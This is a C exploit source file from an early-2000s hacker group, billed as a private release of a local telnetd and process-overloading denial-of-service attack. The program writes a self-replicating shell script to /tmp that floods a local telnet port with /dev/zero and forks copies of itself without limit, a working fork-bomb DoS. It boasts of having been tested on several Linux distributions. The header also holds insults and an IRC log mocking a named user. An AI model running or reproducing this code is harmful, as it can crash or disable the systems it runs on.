/*
* MaD SKiLL 'H'
* http://www.madskill.tk
*
* Telnetd + Process overloading exploit
* 
*                                                                 
* NNN)   NNN)       (NNNNNN.   .JNNN_ NN)  JNN)    JNN    .NN)    
* NNNN. JNNN        (NNNNNNNL  NNNNNN NN) (NNN`    4NF    `NN`    
* (NNNL.NNNF  .NN.  (NN   `NN) NNL `N (N)JNN)F NN  (N)     NN     
* (N)NNNN4N)  NNNN   NN    4N) `NNNL  (NNNN`() NN  (N)     NN     
* (N)(NNF(N) JNLNNL  N)    NN).. 4NNN `NNNNL   NN   N)     (N     
*  NN NN (N) NNNNNN).NN .JNNN.(NL JNN  N)(NNN. (N   NN __J (N).__)
*  NN N  (N)(NN) (N)(NNNNNNF()`NNNNNN  NN  NNN (N)  NNNNNN (NNNNN)
*  )  "  `/N ` N  `)(FF4`"" () _F`N N)`FF   `  (N) `N"` `F 4F"  4`
* ()       `         (N        N)          N   N)       ()      N 
* 
*                                                       
*      NN   NNN)   NNNN  NNN.  JNN  .JNNN. (NNNNNN. NNNNNNNNN
*      NN   (NN`  (NNNF  NNNN .NNN .NNNNNN. NNNNNNN NNNNFNNNF
*      NN    NN) .NN4N)   NNNNNN)L (NF``NN) NN  .NN /`  JNN"`
*      NNNNNNNN) JN) N)   ``NNN) N (N    N) (NNNNNF L  JNN)  
*      4NNNNNNN)(NNNNNNN   JNNNNL" (N)  (N) (NNNNL  `.NNN``  
*      (N`  `NN``FN4"NF( .JNN (NNN.`NN._NN  NN `NNL .NN) ._J)
*      (N    NN. (.  N)  NNN   4NN) NNNNN)  NN  (NN NNNNNNNN)
*      (J)   NN) () (4)  "FN     )  `LF  J  `    4) `4  ) 4")
*      ``    ()      ``    N         ()      ()  ``    (N    
*                                                                 
*
* Telnetd + Process overloading DoS flaw was found by Zombie of MsH
* Zombie wrote a code for it, I rewrote it the right way. *PRIVATE RELEASE*
*
* Tested on:
* Slackware 8.0 ..... kernel 2.4.18 STABLE: Vulnerable
* RedHat 7.2 ........ kernel 2.4.18 STABLE: Vulnerable
* Mandrake 8.2 ...... kernel 2.4.18 STABLE: Vulnerable
*
* -skyrim (skyrim@m4dskill.tk)
*
* Note: This sploit is for localhost only (!)
* 
*
* Shouts go to: MsH, DFA, uDc, DBH; zombie, [4|20], lau, kebab_demon, madness, microtech, 
* execv, sanchez, omnisync, Primus, ZroBioNe, Am0k, Xo|l, slash_, raZzle, fearless, samko, 
* DJ----, Slider, mannie, Kell and all others
*
* Fuckoffs to: Daimon_x, A lame kiddo who does nothing but jerking 23/7 and the other hours
* he gets on IRC to tell everyone he's laughing.
* ##IRC LOG##
* <Daimon_x> QhWHahaHAWHhahwahWHawhaHWhAhaha
* <Daimon_x> I lAuGh, I lAugH VeRy lOud
* <skyrim> k..
* <Daimon_x> hihihihihihihiihhihiihihahahahihihii
* <Daimon_x> tRy anD HaX mE if U cAN hahahahahahahahah
* <skyrim> no
* <Daimon_x> wHy u CaNt eVeN hAx winDozE XP ?!?!?!?!?!?! HaHaHiHi
* <skyrim> ..
* <Daimon_x> HaHaHiHi u ArE sO lAmE
* <Daimon_x> eVeN i CaN hAcK wiTh TeLnEt BuT BuWhaHWhahAha U proLly DoNt kNoW wHaT ThAt iS dO U u SuCkA
*
*/

#include <stdio.h>

main(int argc, char *argv[]) {
int attackport;
FILE *file;

printf(".:[MaD SKiLL 'H']:.\nLocal telnetd + kernel overflow DoS\n\n");

if (argc!=2) { fprintf(stderr, "[+] Usage: %s <telnetd port>\n", argv[0]); exit(1); }

attackport=atoi(argv[1]);

printf("[+] Generating telnetd repeat thread.. ");
file = fopen("/tmp/0wnage382","w");
/* Generate the code file */
fprintf(file, "#!/bin/sh\n");
fprintf(file, "telnet 127.0.0.1 %d < /dev/zero > /dev/null & \n telnet 127.0.0.1 %d < /dev/zero > /dev/null &\n", attackport, attackport);
fprintf(file, "/bin/sh /tmp/0wnage382 &\n/bin/sh /tmp/0wnage382 &\n /bin/sh /tmp/0wnage382 &\n");
close(file);

printf("OK\n[+] Calling telnetd repeat threads..");
printf(" 1");
system("/bin/sh /tmp/0wnage382");
printf(" 2");
system("/bin/sh /tmp/0wnage382");
printf(" 3");
system("/bin/sh /tmp/0wnage382");
printf("\n[+] Repeat threads blasting!\n");
printf("\nDoS successfull. MsH 0wnz j00!");
}